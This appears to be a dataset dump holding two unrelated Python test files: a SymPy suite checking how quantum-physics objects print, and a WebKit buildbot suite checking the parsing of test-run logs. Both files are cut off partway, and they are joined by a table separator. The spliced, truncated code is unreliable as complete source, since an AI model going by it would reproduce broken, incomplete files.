input stringlengths 2.65k 237k | output stringclasses 1
value |
|---|---|
# -*- encoding: utf-8 -*-
"""
TODO:
* Address Issue 2251, printing of spin states
"""
from sympy.physics.quantum.anticommutator import AntiCommutator
from sympy.physics.quantum.cg import CG, Wigner3j, Wigner6j, Wigner9j
from sympy.physics.quantum.commutator import Commutator
from sympy.physics.quantum.constants import hbar
from sympy.physics.quantum.dagger import Dagger
from sympy.physics.quantum.gate import CGate, CNotGate, IdentityGate, UGate, XGate
from sympy.physics.quantum.hilbert import ComplexSpace, FockSpace, HilbertSpace, L2
from sympy.physics.quantum.innerproduct import InnerProduct
from sympy.physics.quantum.operator import Operator, OuterProduct, DifferentialOperator
from sympy.physics.quantum.qexpr import QExpr
from sympy.physics.quantum.qubit import Qubit, IntQubit
from sympy.physics.quantum.spin import Jz, J2, JzBra, JzBraCoupled, JzKet, JzKetCoupled, Rotation, WignerD
from sympy.physics.quantum.state import Bra, Ket, TimeDepBra, TimeDepKet
from sympy.physics.quantum.tensorproduct import TensorProduct
from sympy.physics.quantum.sho1d import RaisingOp
from sympy import Derivative, Function, Interval, Matrix, Pow, S, symbols, Symbol, oo
from sympy.core.compatibility import exec_
from sympy.utilities.pytest import XFAIL
# Imports used in srepr strings
from sympy.physics.quantum.spin import JzOp
from sympy.printing import srepr
from sympy.printing.pretty import pretty as xpretty
from sympy.printing.latex import latex
from sympy.core.compatibility import u_decode as u
MutableDenseMatrix = Matrix
ENV = {}
exec_('from sympy import *', ENV)
exec_('from sympy.physics.quantum import *', ENV)
exec_('from sympy.physics.quantum.cg import *', ENV)
exec_('from sympy.physics.quantum.spin import *', ENV)
exec_('from sympy.physics.quantum.hilbert import *', ENV)
exec_('from sympy.physics.quantum.qubit import *', ENV)
exec_('from sympy.physics.quantum.qexpr import *', ENV)
exec_('from sympy.physics.quantum.gate import *', ENV)
exec_('from sympy.physics.quantum.constants import *', ENV)
def sT(expr, string):
"""
sT := sreprTest
from sympy/printing/tests/test_repr.py
"""
assert srepr(expr) == string
assert eval(string, ENV) == expr
def pretty(expr):
"""ASCII pretty-printing"""
return xpretty(expr, use_unicode=False, wrap_line=False)
def upretty(expr):
"""Unicode pretty-printing"""
return xpretty(expr, use_unicode=True, wrap_line=False)
def test_anticommutator():
A = Operator('A')
B = Operator('B')
ac = AntiCommutator(A, B)
ac_tall = AntiCommutator(A**2, B)
assert str(ac) == '{A,B}'
assert pretty(ac) == '{A,B}'
assert upretty(ac) == u'{A,B}'
assert latex(ac) == r'\left\{A,B\right\}'
sT(ac, "AntiCommutator(Operator(Symbol('A')),Operator(Symbol('B')))")
assert str(ac_tall) == '{A**2,B}'
ascii_str = \
"""\
/ 2 \\\n\
<A ,B>\n\
\\ /\
"""
ucode_str = \
u("""\
⎧ 2 ⎫\n\
⎨A ,B⎬\n\
⎩ ⎭\
""")
assert pretty(ac_tall) == ascii_str
assert upretty(ac_tall) == ucode_str
assert latex(ac_tall) == r'\left\{A^{2},B\right\}'
sT(ac_tall, "AntiCommutator(Pow(Operator(Symbol('A')), Integer(2)),Operator(Symbol('B')))")
def test_cg():
cg = CG(1, 2, 3, 4, 5, 6)
wigner3j = Wigner3j(1, 2, 3, 4, 5, 6)
wigner6j = Wigner6j(1, 2, 3, 4, 5, 6)
wigner9j = Wigner9j(1, 2, 3, 4, 5, 6, 7, 8, 9)
assert str(cg) == 'CG(1, 2, 3, 4, 5, 6)'
ascii_str = \
"""\
5,6 \n\
C \n\
1,2,3,4\
"""
ucode_str = \
u("""\
5,6 \n\
C \n\
1,2,3,4\
""")
assert pretty(cg) == ascii_str
assert upretty(cg) == ucode_str
assert latex(cg) == r'C^{5,6}_{1,2,3,4}'
sT(cg, "CG(Integer(1), Integer(2), Integer(3), Integer(4), Integer(5), Integer(6))")
assert str(wigner3j) == 'Wigner3j(1, 2, 3, 4, 5, 6)'
ascii_str = \
"""\
/1 3 5\\\n\
| |\n\
\\2 4 6/\
"""
ucode_str = \
u("""\
⎛1 3 5⎞\n\
⎜ ⎟\n\
⎝2 4 6⎠\
""")
assert pretty(wigner3j) == ascii_str
assert upretty(wigner3j) == ucode_str
assert latex(wigner3j) == \
r'\left(\begin{array}{ccc} 1 & 3 & 5 \\ 2 & 4 & 6 \end{array}\right)'
sT(wigner3j, "Wigner3j(Integer(1), Integer(2), Integer(3), Integer(4), Integer(5), Integer(6))")
assert str(wigner6j) == 'Wigner6j(1, 2, 3, 4, 5, 6)'
ascii_str = \
"""\
/1 2 3\\\n\
< >\n\
\\4 5 6/\
"""
ucode_str = \
u("""\
⎧1 2 3⎫\n\
⎨ ⎬\n\
⎩4 5 6⎭\
""")
assert pretty(wigner6j) == ascii_str
assert upretty(wigner6j) == ucode_str
assert latex(wigner6j) == \
r'\left\{\begin{array}{ccc} 1 & 2 & 3 \\ 4 & 5 & 6 \end{array}\right\}'
sT(wigner6j, "Wigner6j(Integer(1), Integer(2), Integer(3), Integer(4), Integer(5), Integer(6))")
assert str(wigner9j) == 'Wigner9j(1, 2, 3, 4, 5, 6, 7, 8, 9)'
ascii_str = \
"""\
/1 2 3\\\n\
| |\n\
<4 5 6>\n\
| |\n\
\\7 8 9/\
"""
ucode_str = \
u("""\
⎧1 2 3⎫\n\
⎪ ⎪\n\
⎨4 5 6⎬\n\
⎪ ⎪\n\
⎩7 8 9⎭\
""")
assert pretty(wigner9j) == ascii_str
assert upretty(wigner9j) == ucode_str
assert latex(wigner9j) == \
r'\left\{\begin{array}{ccc} 1 & 2 & 3 \\ 4 & 5 & 6 \\ 7 & 8 & 9 \end{array}\right\}'
sT(wigner9j, "Wigner9j(Integer(1), Integer(2), Integer(3), Integer(4), Integer(5), Integer(6), Integer(7), Integer(8), Integer(9))")
def test_commutator():
A = Operator('A')
B = Operator('B')
c = Commutator(A, B)
c_tall = Commutator(A**2, B)
assert str(c) == '[A,B]'
assert pretty(c) == '[A,B]'
assert upretty(c) == u'[A,B]'
assert latex(c) == r'\left[A,B\right]'
sT(c, "Commutator(Operator(Symbol('A')),Operator(Symbol('B')))")
assert str(c_tall) == '[A**2,B]'
ascii_str = \
"""\
[ 2 ]\n\
[A ,B]\
"""
ucode_str = \
u("""\
⎡ 2 ⎤\n\
⎣A ,B⎦\
""")
assert pretty(c_tall) == ascii_str
assert upretty(c_tall) == ucode_str
assert latex(c_tall) == r'\left[A^{2},B\right]'
sT(c_tall, "Commutator(Pow(Operator(Symbol('A')), Integer(2)),Operator(Symbol('B')))")
def test_constants():
assert str(hbar) == 'hbar'
assert pretty(hbar) == 'hbar'
assert upretty(hbar) == u'ℏ'
assert latex(hbar) == r'\hbar'
sT(hbar, "HBar()")
def test_dagger():
x = symbols('x')
expr = Dagger(x)
assert str(expr) == 'Dagger(x)'
ascii_str = \
"""\
+\n\
x \
"""
ucode_str = \
u("""\
†\n\
x \
""")
assert pretty(expr) == ascii_str
assert upretty(expr) == ucode_str
assert latex(expr) == r'x^{\dagger}'
sT(expr, "Dagger(Symbol('x'))")
@XFAIL
def test_gate_failing():
a, b, c, d = symbols('a,b,c,d')
uMat = Matrix([[a, b], [c, d]])
g = UGate((0,), uMat)
assert str(g) == 'U(0)'
def test_gate():
a, b, c, d = symbols('a,b,c,d')
uMat = Matrix([[a, b], [c, d]])
q = Qubit(1, 0, 1, 0, 1)
g1 = IdentityGate(2)
g2 = CGate((3, 0), XGate(1))
g3 = CNotGate(1, 0)
g4 = UGate((0,), uMat)
assert str(g1) == '1(2)'
assert pretty(g1) == '1 \n 2'
assert upretty(g1) == u'1 \n 2'
assert latex(g1) == r'1_{2}'
sT(g1, "IdentityGate(Integer(2))")
assert str(g1*q) == '1(2)*|10101>'
ascii_str = \
"""\
1 *|10101>\n\
2 \
"""
ucode_str = \
u("""\
1 ⋅❘10101⟩\n\
2 \
""")
assert pretty(g1*q) == ascii_str
assert upretty(g1*q) == ucode_str
assert latex(g1*q) == r'1_{2} {\left|10101\right\rangle }'
sT(g1*q, "Mul(IdentityGate(Integer(2)), Qubit(Integer(1),Integer(0),Integer(1),Integer(0),Integer(1)))")
assert str(g2) == 'C((3,0),X(1))'
ascii_str = \
"""\
C /X \\\n\
3,0\\ 1/\
"""
ucode_str = \
u("""\
C ⎛X ⎞\n\
3,0⎝ 1⎠\
""")
assert pretty(g2) == ascii_str
assert upretty(g2) == ucode_str
assert latex(g2) == r'C_{3,0}{\left(X_{1}\right)}'
sT(g2, "CGate(Tuple(Integer(3), Integer(0)),XGate(Integer(1)))")
assert str(g3) == 'CNOT(1,0)'
ascii_str = \
"""\
CNOT \n\
1,0\
"""
ucode_str = \
u("""\
CNOT \n\
1,0\
""")
assert pretty(g3) == ascii_str
assert upretty(g3) == ucode_str
assert latex(g3) == r'CNOT_{1,0}'
sT(g3, "CNotGate(Integer(1),Integer(0))")
ascii_str = \
"""\
U \n\
0\
"""
ucode_str = \
u("""\
U \n\
0\
""")
assert str(g4) == \
"""\
U((0,),Matrix([\n\
[a, b],\n\
[c, d]]))\
"""
assert pretty(g4) == ascii_str
assert upretty(g4) == ucode_str
assert latex(g4) == r'U_{0}'
sT(g4, "UGate(Tuple(Integer(0)),MutableDenseMatrix([[Symbol('a'), Symbol('b')], [Symbol('c'), Symbol('d')]]))")
def test_hilbert():
h1 = HilbertSpace()
h2 = ComplexSpace(2)
h3 = FockSpace()
h4 = L2(Interval(0, oo))
assert str(h1) == 'H'
assert pretty(h1) == 'H'
assert upretty(h1) == u'H'
assert latex(h1) == r'\mathcal{H}'
sT(h1, "HilbertSpace()")
assert str(h2) == 'C(2)'
ascii_str = \
"""\
2\n\
C \
"""
ucode_str = \
u("""\
2\n\
C \
""")
assert pretty(h2) == ascii_str
assert upretty(h2) == ucode_str
assert latex(h2) == r'\mathcal{C}^{2}'
sT(h2, "ComplexSpace(Integer(2))")
assert str(h3) == 'F'
assert pretty(h3) == 'F'
assert upretty(h3) == u'F'
assert latex(h3) == r'\mathcal{F}'
sT(h3, "FockSpace()")
assert str(h4) == 'L2(Interval(0, oo))'
ascii_str = \
"""\
2\n\
L \
"""
ucode_str = \
u("""\
2\n\
L \
""")
assert pretty(h4) == ascii_str
assert upretty(h4) == ucode_str
assert latex(h4) == r'{\mathcal{L}^2}\left( \left[0, \infty\right) \right)'
sT(h4, "L2(Interval(Integer(0), oo, false, true))")
assert str(h1 + h2) == 'H+C(2)'
ascii_str = \
"""\
2\n\
H + C \
"""
ucode_str = \
u("""\
2\n\
H ⊕ C \
""")
assert pretty(h1 + h2) == ascii_str
assert upretty(h1 + h2) == ucode_str
assert latex(h1 + h2)
sT(h1 + h2, "DirectSumHilbertSpace(HilbertSpace(),ComplexSpace(Integer(2)))")
assert str(h1*h2) == "H*C(2)"
ascii_str = \
"""\
2\n\
H x C \
"""
ucode_str = \
u("""\
2\n\
H ⨂ C \
""")
assert pretty(h1*h2) == ascii_str
assert upretty(h1*h2) == ucode_str
assert latex(h1*h2)
sT(h1*h2,
"TensorProductHilbertSpace(HilbertSpace(),ComplexSpace(Integer(2)))")
assert str(h1**2) == 'H**2'
ascii_str = \
"""\
x2\n\
H \
"""
ucode_str = \
u("""\
⨂2\n\
H \
""")
assert pretty(h1**2) == ascii_str
assert upretty(h1**2) == ucode_str
assert latex(h1**2) == r'{\mathcal{H}}^{\otimes 2}'
sT(h1**2, "TensorPowerHilbertSpace(HilbertSpace(),Integer(2))")
def test_innerproduct():
x = symbols('x')
ip1 = InnerProduct(Bra(), Ket())
ip2 = InnerProduct(TimeDepBra(), TimeDepKet())
ip3 = InnerProduct(JzBra(1, 1), JzKet(1, 1))
ip4 = InnerProduct(JzBraCoupled(1, 1, (1, 1)), JzKetCoupled(1, 1, (1, 1)))
ip_tall1 = InnerProduct(Bra(x/2), Ket(x/2))
ip_tall2 = InnerProduct(Bra(x), Ket(x/2))
ip_tall3 = InnerProduct(Bra(x/2), Ket(x))
assert str(ip1) == '<psi|psi>'
assert pretty(ip1) == '<psi|psi>'
assert upretty(ip1) == u'⟨ψ❘ψ⟩'
assert latex(
ip1) == r'\left\langle \psi \right. {\left|\psi\right\rangle }'
sT(ip1, "InnerProduct(Bra(Symbol('psi')),Ket(Symbol('psi')))")
assert str(ip2) == '<psi;t|psi;t>'
assert pretty(ip2) == '<psi;t|psi;t>'
assert upretty(ip2) == u'⟨ψ;t❘ψ;t⟩'
assert latex(ip2) == \
r'\left\langle \psi;t \right. {\left|\psi;t\right\rangle }'
sT(ip2, "InnerProduct(TimeDepBra(Symbol('psi'),Symbol('t')),TimeDepKet(Symbol('psi'),Symbol('t')))")
assert str(ip3) == "<1,1|1,1>"
assert pretty(ip3) == '<1,1|1,1>'
assert upretty(ip3) == u'⟨1,1❘1,1⟩'
assert latex(ip3) == r'\left\langle 1,1 \right. {\left|1,1\right\rangle }'
sT(ip3, "InnerProduct(JzBra(Integer(1),Integer(1)),JzKet(Integer(1),Integer(1)))")
assert str(ip4) == "<1,1,j1=1,j2=1|1,1,j1=1,j2=1>"
assert pretty(ip4) == '<1,1,j1=1,j2=1|1,1,j1=1,j2=1>'
assert upretty(ip4) == u'⟨1,1,j₁=1,j₂=1❘1,1,j₁=1,j₂=1⟩'
assert latex(ip4) == \
r'\left\langle 1,1,j_{1}=1,j_{2}=1 \right. {\left|1,1,j_{1}=1,j_{2}=1\right\rangle }'
sT(ip4, "InnerProduct(JzBraCoupled(Integer(1),Integer(1),Tuple(Integer(1), Integer(1)),Tuple(Tuple(Integer(1), Integer(2), Integer(1)))),JzKetCoupled(Integer(1),Integer(1),Tuple(Integer(1), Integer(1)),Tuple(Tuple(Integer(1), Integer(2), Integer(1)))))")
assert str(ip_tall1) == '<x/2|x/2>'
ascii_str = \
"""\
/ | \\ \n\
/ x|x \\\n\
\\ -|- /\n\
\\2|2/ \
"""
ucode_str = \
u("""\
╱ │ ╲ \n\
╱ x│x ╲\n\
╲ ─│─ ╱\n\
╲2│2╱ \
""")
assert pretty(ip_tall1) == ascii_str
assert upretty(ip_tall1) == ucode_str
assert latex(ip_tall1) == \
r'\left\langle \frac{x}{2} \right. {\left|\frac{x}{2}\right\rangle }'
sT(ip_tall1, "InnerProduct(Bra(Mul(Rational(1, 2), Symbol('x'))),Ket(Mul(Rational(1, 2), Symbol('x'))))")
assert str(ip_tall2) == '<x|x/2>'
ascii_str = \
"""\
/ | \\ \n\
/ |x \\\n\
\\ x|- /\n\
\\ |2/ \
"""
ucode_str = \
u("""\
╱ │ ╲ \n\
╱ │x ╲\n\
╲ x│─ | |
<reponame>jacadcaps/webkitty<gh_stars>1-10
#! /usr/bin/env python
import sys
import os
import StringIO
import unittest
import make_passwords_json
import json
# Show DepricationWarnings come from buildbot - it isn't default with Python 2.7 or newer.
# See https://bugs.webkit.org/show_bug.cgi?id=90161 for details.
import warnings
warnings.simplefilter('default')
class BuildBotConfigLoader(object):
def _add_webkitpy_to_sys_path(self):
# When files are passed to the python interpreter on the command line (e.g. python test.py) __file__ is a relative path.
absolute_file_path = os.path.abspath(__file__)
webkit_org_config_dir = os.path.dirname(absolute_file_path)
build_slave_support_dir = os.path.dirname(webkit_org_config_dir)
webkit_tools_dir = os.path.dirname(build_slave_support_dir)
scripts_dir = os.path.join(webkit_tools_dir, 'Scripts')
sys.path.append(scripts_dir)
def _add_dependent_modules_to_sys_modules(self):
self._add_webkitpy_to_sys_path()
from webkitpy.thirdparty.autoinstalled import buildbot
sys.modules['buildbot'] = buildbot
class RunWebKitTestsTest(unittest.TestCase):
def test_nrwt_leaks_parsing(self):
run_webkit_tests = RunWebKitTests() # pylint is confused by the way we import the module ... pylint: disable-msg=E0602
log_text = """
12:44:24.295 77706 13981 total leaks found for a total of 197,936 bytes.
12:44:24.295 77706 1 unique leaks found.
"""
expected_incorrect_lines = [
'13981 total leaks found for a total of 197,936 bytes.',
'1 unique leaks found.',
]
run_webkit_tests._parseRunWebKitTestsOutput(log_text)
self.assertEqual(run_webkit_tests.incorrectLayoutLines, expected_incorrect_lines)
def test_nrwt_missing_results(self):
run_webkit_tests = RunWebKitTests() # pylint is confused by the way we import the module ... pylint: disable-msg=E0602
log_text = """
Expected to fail, but passed: (2)
animations/additive-transform-animations.html
animations/cross-fade-webkit-mask-box-image.html
Unexpected flakiness: text-only failures (2)
fast/events/touch/touch-inside-iframe.html [ Failure Pass ]
http/tests/inspector-enabled/console-clear-arguments-on-frame-navigation.html [ Failure Pass ]
Unexpected flakiness: timeouts (1)
svg/text/foreignObject-repaint.xml [ Timeout Pass ]
Regressions: Unexpected missing results (1)
svg/custom/zero-path-square-cap-rendering2.svg [ Missing ]
Regressions: Unexpected text-only failures (1)
svg/custom/zero-path-square-cap-rendering2.svg [ Failure ]
"""
run_webkit_tests._parseRunWebKitTestsOutput(log_text)
self.assertEqual(set(run_webkit_tests.incorrectLayoutLines),
set(['2 new passes', '3 flakes', '1 missing results', '1 failures']))
class StubStdio(object):
def __init__(self, stdio):
self._stdio = stdio
def getText(self):
return self._stdio
class StubRemoteCommand(object):
def __init__(self, rc, stdio):
self.rc = rc
self.logs = {'stdio': StubStdio(stdio)}
class RunJavaScriptCoreTestsTest(unittest.TestCase):
def assertResults(self, expected_result, expected_text, rc, stdio):
cmd = StubRemoteCommand(rc, stdio)
step = RunJavaScriptCoreTests()
step.commandComplete(cmd)
actual_results = step.evaluateCommand(cmd)
actual_text = step.getText2(cmd, actual_results)
self.assertEqual(expected_result, actual_results)
self.assertEqual(actual_text, expected_text)
def test_no_regressions_old_output(self):
self.assertResults(SUCCESS, ["jscore-test"], 0, """Results for Mozilla tests:
0 regressions found.
0 tests fixed.
OK.""")
def test_no_failure_new_output(self):
self.assertResults(SUCCESS, ["jscore-test"], 0, """Results for JSC stress tests:
0 failures found.
OK.""")
def test_mozilla_failure_old_output(self):
self.assertResults(FAILURE, ["1 JSC test failed"], 1, """Results for Mozilla tests:
1 regression found.
0 tests fixed.""")
def test_mozilla_failures_old_output(self):
self.assertResults(FAILURE, ["2 JSC tests failed"], 1, """Results for Mozilla tests:
2 regressions found.
0 tests fixed.""")
def test_jsc_stress_failure_new_output(self):
self.assertResults(FAILURE, ["1 JSC test failed"], 1, """Results for JSC stress tests:
1 failure found.""")
def test_jsc_stress_failures_new_output(self):
self.assertResults(FAILURE, ["5 JSC tests failed"], 1, """Results for JSC stress tests:
5 failures found.""")
def test_jsc_stress_failures_with_binary_results_output(self):
self.assertResults(FAILURE, ["8 JSC tests failed"], 1, """Results for JSC stress tests:
5 failures found.
Results for JSC test binaries:
3 failures found.""")
def test_jsc_stress_failures_with_binary_result_output(self):
self.assertResults(FAILURE, ["6 JSC tests failed"], 1, """Results for JSC stress tests:
5 failures found.
Results for JSC test binaries:
1 failure found.""")
class RunTest262TestsTest(unittest.TestCase):
def assertResults(self, expected_result, expected_text, rc, stdio):
cmd = StubRemoteCommand(rc, stdio)
step = RunTest262Tests()
step.commandComplete(cmd)
actual_results = step.evaluateCommand(cmd)
actual_text = step.getText2(cmd, actual_results)
self.assertEqual(expected_result, actual_results)
self.assertEqual(actual_text, expected_text)
def test_no_regressions_output(self):
self.assertResults(SUCCESS, ["test262-test"], 0, """
-------------------------Settings------------------------
Test262 Dir: JSTests/test262
JSC: WebKitBuild/Release/jsc
DYLD_FRAMEWORK_PATH: WebKitBuild/Release
Child Processes: 32
Config file: Tools/Scripts/test262/config.yaml
Expectations file: Tools/Scripts/test262/expectations.yaml
--------------------------------------------------------
NEW PASS: test/annexB/built-ins/Date/prototype/getYear/length.js (default)
NEW PASS test/language/expressions/class/fields-after-same-line-static-method-computed-symbol-names.js (default)
Run with --save to save a new expectations file
Saved all the results in Tools/Scripts/test262/results.yaml
Summarizing results...
See summarized results in Tools/Scripts/test262/results-summary.txt
56071 tests ran
0 expected tests failed
0 tests newly fail
2546 tests newly pass
1241 test files skipped
Done in 247 seconds!
""")
def test_failure_output(self):
self.assertResults(FAILURE, ["1 Test262 test failed"], 0, """
-------------------------Settings------------------------
Test262 Dir: JSTests/test262
JSC: WebKitBuild/Release/jsc
DYLD_FRAMEWORK_PATH: WebKitBuild/Release
Child Processes: 32
Config file: Tools/Scripts/test262/config.yaml
Expectations file: Tools/Scripts/test262/expectations.yaml
--------------------------------------------------------
! NEW FAIL: test/annexB/built-ins/Date/prototype/getYear/length.js (default)
NEW PASS test/language/expressions/class/fields-after-same-line-static-method-computed-symbol-names.js (default)
Run with --save to save a new expectations file
Saved all the results in Tools/Scripts/test262/results.yaml
Summarizing results...
See summarized results in Tools/Scripts/test262/results-summary.txt
56071 tests ran
0 expected tests failed
0 tests newly fail
2546 tests newly pass
1241 test files skipped
Done in 247 seconds!
""")
def test_failures_output(self):
self.assertResults(FAILURE, ["2 Test262 tests failed"], 0, """
-------------------------Settings------------------------
Test262 Dir: JSTests/test262
JSC: WebKitBuild/Release/jsc
DYLD_FRAMEWORK_PATH: WebKitBuild/Release
Child Processes: 32
Config file: Tools/Scripts/test262/config.yaml
Expectations file: Tools/Scripts/test262/expectations.yaml
--------------------------------------------------------
NEW PASS test/language/statements/class/fields-after-same-line-static-async-gen-computed-names.js (default)
! NEW FAIL: test/annexB/built-ins/Date/prototype/getYear/length.js (default)
! NEW FAIL: test/annexB/built-ins/Date/prototype/getYear/length.js (strict mode)
NEW PASS test/language/expressions/class/fields-after-same-line-static-method-computed-symbol-names.js (default)
Run with --save to save a new expectations file
Saved all the results in Tools/Scripts/test262/results.yaml
Summarizing results...
See summarized results in Tools/Scripts/test262/results-summary.txt
56071 tests ran
0 expected tests failed
0 tests newly fail
2546 tests newly pass
1241 test files skipped
Done in 247 seconds!
""")
class RunLLINTCLoopTestsTest(unittest.TestCase):
def assertResults(self, expected_result, expected_text, rc, stdio):
cmd = StubRemoteCommand(rc, stdio)
step = RunLLINTCLoopTests()
step.commandComplete(cmd)
actual_results = step.evaluateCommand(cmd)
actual_text = step.getText2(cmd, actual_results)
self.assertEqual(expected_result, actual_results)
self.assertEqual(actual_text, expected_text)
def test_failures(self):
self.assertResults(FAILURE, ['5 regressions found.'], 1, ' 5 regressions found.')
def test_failure(self):
self.assertResults(FAILURE, ['1 regression found.'], 1, ' 1 regression found.')
def test_no_failure(self):
self.assertResults(SUCCESS, ['webkit-jsc-cloop-test'], 0, ' 0 regressions found.')
class Run32bitJSCTestsTest(unittest.TestCase):
def assertResults(self, expected_result, expected_text, rc, stdio):
cmd = StubRemoteCommand(rc, stdio)
step = Run32bitJSCTests()
step.commandComplete(cmd)
actual_results = step.evaluateCommand(cmd)
actual_text = step.getText2(cmd, actual_results)
self.assertEqual(expected_result, actual_results)
self.assertEqual(actual_text, expected_text)
def test_failures(self):
self.assertResults(FAILURE, ['5 regressions found.'], 1, ' 5 failures found.')
def test_failure(self):
self.assertResults(FAILURE, ['1 regression found.'], 1, ' 1 failure found.')
def test_no_failure(self):
self.assertResults(SUCCESS, ['webkit-32bit-jsc-test'], 0, ' 0 failures found.')
class RunAPITestsTest(unittest.TestCase):
def assertFailures(self, expected_failure_count, stdio):
if expected_failure_count:
rc = 1
expected_results = FAILURE
plural_suffix = "" if expected_failure_count == 1 else "s"
expected_text = '%d api test%s failed or timed out' % (expected_failure_count, plural_suffix)
else:
rc = 0
expected_results = SUCCESS
expected_text = 'run-api-tests'
cmd = StubRemoteCommand(rc, stdio)
step = RunAPITests()
step.commandComplete(cmd)
actual_results = step.evaluateCommand(cmd)
actual_failure_count = step.failedTestCount
actual_text = step.getText(cmd, actual_results)[0]
self.assertEqual(expected_results, actual_results)
self.assertEqual(expected_failure_count, actual_failure_count)
self.assertEqual(expected_text, actual_text)
def test_no_failures_or_timeouts(self):
self.assertFailures(0, """...
worker/0 TestWTF.WTF_Variant.OperatorAmpersand Passed
worker/0 TestWTF.WTF_Variant.Ref Passed
worker/0 TestWTF.WTF_Variant.RefPtr Passed
worker/0 TestWTF.WTF_Variant.RetainPtr Passed
worker/0 TestWTF.WTF_Variant.VisitorUsingMakeVisitor Passed
worker/0 TestWTF.WTF_Variant.VisitorUsingSwitchOn Passed
worker/0 exiting
Ran 1888 tests of 1888 with 1888 successful
------------------------------
All tests successfully passed!
""")
def test_no_failures_or_timeouts_with_disabled(self):
self.assertFailures(0, """...
worker/0 TestWTF.WTF_Variant.OperatorAmpersand Passed
worker/0 TestWTF.WTF_Variant.Ref Passed
worker/0 TestWTF.WTF_Variant.RefPtr Passed
worker/0 TestWTF.WTF_Variant.RetainPtr Passed
worker/0 TestWTF.WTF_Variant.VisitorUsingMakeVisitor Passed
worker/0 TestWTF.WTF_Variant.VisitorUsingSwitchOn Passed
worker/0 exiting
Ran 1881 tests of 1888 with 1881 successful
------------------------------
All tests successfully passed!
""")
def test_one_failure(self):
self.assertFailures(1, """...
worker/0 TestWTF.WTF_Variant.OperatorAmpersand Passed
worker/0 TestWTF.WTF_Variant.Ref Passed
worker/0 TestWTF.WTF_Variant.RefPtr Passed
worker/0 TestWTF.WTF_Variant.RetainPtr Passed
worker/0 TestWTF.WTF_Variant.VisitorUsingMakeVisitor Passed
worker/0 TestWTF.WTF_Variant.VisitorUsingSwitchOn Passed
worker/0 exiting
Ran 1888 tests of 1888 with 1887 successful
------------------------------
Test suite failed
Crashed
TestWTF.WTF.StringConcatenate_Unsigned
**FAIL** WTF.StringConcatenate_Unsigned
C:\\cygwin\\home\\buildbot\\slave\\win-release\\build\\Tools\\TestWebKitAPI\\Tests\\WTF\\StringConcatenate.cpp:84
Value of: makeString("hello ", static_cast<unsigned short>(42) , " world")
Actual: hello 42 world
Expected: "hello * world"
Which is: 74B00C9C
Testing completed, Exit status: 3
""")
def test_multiple_failures(self):
self.assertFailures(2, """...
worker/0 TestWTF.WTF_Variant.OperatorAmpersand Passed
worker/0 TestWTF.WTF_Variant.Ref Passed
worker/0 TestWTF.WTF_Variant.RefPtr Passed
worker/0 TestWTF.WTF_Variant.RetainPtr Passed
worker/0 TestWTF.WTF_Variant.VisitorUsingMakeVisitor Passed
worker/0 TestWTF.WTF_Variant.VisitorUsingSwitchOn Passed
worker/0 exiting
Ran 1888 tests of 1888 with 1886 successful
------------------------------
Test suite failed
Crashed
TestWTF.WTF.StringConcatenate_Unsigned
**FAIL** WTF.StringConcatenate_Unsigned
C:\\cygwin\\home\\buildbot\\slave\\win-release\\build\\Tools\\TestWebKitAPI\\Tests\\WTF\\StringConcatenate.cpp:84
Value of: makeString("hello ", static_cast<unsigned short>(42) , " world")
Actual: hello 42 world
Expected: "hello * world"
Which is: 74B00C9C
TestWTF.WTF_Expected.Unexpected
**FAIL** WTF_Expected.Unexpected
C:\cygwin\home\buildbot\slave\win-release\build\Tools\TestWebKitAPI\Tests\WTF\Expected.cpp:96
Value of: s1
Actual: oops
Expected: s0
Which is: oops
Testing completed, Exit status: 3
""")
def test_one_timeout(self):
self.assertFailures(1, """...
worker/0 TestWTF.WTF_Variant.OperatorAmpersand Passed
worker/0 TestWTF.WTF_Variant.Ref Passed
worker/0 TestWTF.WTF_Variant.RefPtr Passed
worker/0 TestWTF.WTF_Variant.RetainPtr Passed
worker/0 TestWTF.WTF_Variant.VisitorUsingMakeVisitor Passed
worker/0 TestWTF.WTF_Variant.VisitorUsingSwitchOn Passed
worker/0 exiting
Ran 1888 tests of 1888 with 1887 successful
------------------------------
Test suite failed
Timeout
TestWTF.WTF_PoisonedUniquePtrForTriviallyDestructibleArrays.Assignment
Testing completed, Exit status: 3
""")
def test_multiple_timeouts(self):
self.assertFailures(2, """...
worker/0 TestWTF.WTF_Variant.OperatorAmpersand Passed
worker/0 TestWTF.WTF_Variant.Ref Passed
worker/0 TestWTF.WTF_Variant.RefPtr Passed
worker/0 TestWTF.WTF_Variant.RetainPtr Passed
worker/0 TestWTF.WTF_Variant.VisitorUsingMakeVisitor Passed
worker/0 TestWTF.WTF_Variant.VisitorUsingSwitchOn Passed
worker/0 exiting
Ran 1888 tests of 1888 with 1886 successful
------------------------------
Test suite failed
Timeout
TestWTF.WTF_PoisonedUniquePtrForTriviallyDestructibleArrays.Assignment
TestWTF.WTF_Lock.ContendedShortSection
Testing completed, Exit status: 3
""")
def test_multiple_failures_and_timeouts(self):
self.assertFailures(4, """...
worker/0 TestWTF.WTF_Variant.OperatorAmpersand Passed
worker/0 TestWTF.WTF_Variant.Ref Passed
worker/0 TestWTF.WTF_Variant.RefPtr Passed
worker/0 TestWTF.WTF_Variant.RetainPtr Passed
worker/0 TestWTF.WTF_Variant.VisitorUsingMakeVisitor Passed
worker/0 TestWTF.WTF_Variant.VisitorUsingSwitchOn Passed
worker/0 exiting
Ran 1888 tests of 1888 with 1884 successful
------------------------------
Test suite failed
Crashed
TestWTF.WTF.StringConcatenate_Unsigned
**FAIL** WTF.StringConcatenate_Unsigned
C:\\cygwin\\home\\buildbot\\slave\\win-release\\build\\Tools\\TestWebKitAPI\\Tests\\WTF\\StringConcatenate.cpp:84
Value of: makeString("hello ", static_cast<unsigned short>(42) , " world")
Actual: hello 42 world
Expected: "hello * world"
Which is: 74B00C9C
TestWTF.WTF_Expected.Unexpected
**FAIL** WTF_Expected.Unexpected
C:\cygwin\home\buildbot\slave\win-release\build\Tools\TestWebKitAPI\Tests\WTF\Expected.cpp:96
Value of: s1
Actual: oops
Expected: s0
Which is: oops
Timeout
TestWTF.WTF_PoisonedUniquePtrForTriviallyDestructibleArrays.Assignment
TestWTF.WTF_Lock.ContendedShortSection
Testing completed, Exit status: 3
""")
class SVNMirrorTest(unittest.TestCase):
def setUp(self):
self.config = json.load(open('config.json'))
def get_SVNMirrorFromConfig(self, builderName):
SVNMirror = None
for builder in self.config['builders']:
if builder['name'] == builderName:
SVNMirror = builder.pop('SVNMirror', 'https://svn.webkit.org/repository/webkit/')
return SVNMirror
def test_CheckOutSource(self):
